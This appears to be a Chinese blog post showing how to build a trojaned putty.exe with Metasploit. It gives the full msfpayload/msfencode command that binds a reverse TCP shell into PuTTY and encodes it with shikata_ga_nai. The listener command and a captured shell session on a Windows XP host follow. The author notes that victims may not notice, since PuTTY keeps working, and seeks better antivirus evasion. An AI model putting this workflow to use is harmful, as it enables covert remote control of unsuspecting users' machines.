metasploit隐秘地启动一个攻击载荷
来源:互联网 发布:老公是外国人知乎 编辑:程序博客网 时间:2024/04/26 14:43
在网上下载putty.exe,上传到bt5,然后复制到/opt/metasploit/msf3/work目录
root@bt:/opt/metasploit/msf3# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -t exe -x work/putty.exe -o putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)real 0m42.531suser 0m25.086ssys 0m16.381sroot@bt:/opt/metasploit/msf3#
上传到XP,还是报威胁。
我关掉杀毒软件,然后双击putty_backdoor.exe,看看:
弹出这个,但是很快就没了,出现了一两秒的样子。
这时,当我在BT5运行msfcli时,它就一直显示,不会一闪而过:
root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 E[*] Please wait while we load the module tree... ######## # ################# # ###################### # ######################### # ############################ ############################## ############################### ############################### ############################## # ######## # ## ### #### ## ### ### #### ### #### ########## #### ####################### #### #################### #### ################## #### ############ ## ######## ### ######### ##### ############ ###### ######## ######### ##### ######## ### ######### ###### ############ ####################### # # ### # # ## ######################## ## ## ## ## =[ metasploit v4.5.0-dev [core:4.5 api:1.0]+ -- --=[ 927 exploits - 499 auxiliary - 151 post+ -- --=[ 251 payloads - 28 encoders - 8 nopsPAYLOAD => windows/shell_reverse_tcpLHOST => 192.168.1.11LPORT => 31337[*] Started reverse handler on 192.168.1.11:31337 [*] Starting the payload handler...[*] Command shell session 1 opened (192.168.1.11:31337 -> 192.168.1.142:1136) at 2013-04-28 06:13:58 -0400Microsoft Windows XP [版本 5.1.2600](C) 版权所有 1985-2001 Microsoft Corp.C:\1>
运行msfcli后,出现
[*] Starting the payload handler...
时,就双击putty_backdoor.exe,这时,那上面的图片所显示的登录的界面,就一直停留着了,不会像刚才那样,一闪而过了。
而且,它也有putty.exe的功能,能正常登录,如下图:
但是,当我在bt5退出时:
C:\1>exitexit[*] Command shell session 1 closed. Reason: Died from Errno::ECONNRESETroot@bt:~#
XP上的登录界面(如上图所示)也没有了。
这时,不明真相的人,可能并不会在意。不过,如果多试几次,可能会看出点问题来。
现在的问题是,这个exe惊动了杀毒软件,没有躲过杀毒软件。
- metasploit隐秘地启动一个攻击载荷
- 理解攻击载荷
- Metasploit 攻击
- meterpreter的攻击载荷使用
- 实现一个Web版的类Metasploit的攻击框架
- metasploit 自动攻击
- Metasploit 攻击winXP
- StAX的一个隐秘bug
- 缓冲区溢出攻击框架Metasploit
- metasploit 攻击成功的实例
- metasploit的令牌假冒攻击
- metasploit的WEB攻击向量
- metasploit的客户端WEB攻击
- 初探Metasploit的自动攻击
- 利用Metasploit来攻击Mysql
- 初探Metasploit的自动攻击
- kali 2016 Metasploit启动
- kali 首次启动metasploit
- java中读取Properties 文件
- 警告提示:Package struts extends undefined package struts-default
- Oracle10g 各个服务的作用
- 设计模式六大原则
- windows程序设计特点
- metasploit隐秘地启动一个攻击载荷
- Git详解之三:Git分支
- 优化器
- 深入JVM锁机制2-Lock
- 大话设计模式 代理模式
- 01.IOS学习笔记之MAC OS X 简介
- Git详解之四:服务器上的Git
- 一致性哈希(综合版本)
- Hadoop 解除 "Name node is in safe mode"